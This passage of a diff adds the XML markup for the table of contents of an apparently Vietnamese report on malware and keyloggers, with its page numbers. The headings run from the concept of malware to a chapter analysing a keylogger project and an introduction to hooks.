+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761763" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.1. Khái niệm mã độc</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761763 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761764" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.2. Các loại mã độc</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761764 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761765" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.3. Khái niệm Keylogger</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761765 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761766" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.4. Mục đích của Keylogger</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761766 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761767" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.5. Những vụ tấn công bằng Keylogger nổi tiếng</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761767 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761768" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1.6. Con đường lây nhiễm Keylogger</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761768 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761769" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>*/ Tiểu kết chương 1:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761769 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761770" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>CHƯƠNG II: PHÂN TÍCH PROJECT KEYLOGGER</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761770 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761771" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.1. Giới thiệu về Hook</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761771 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
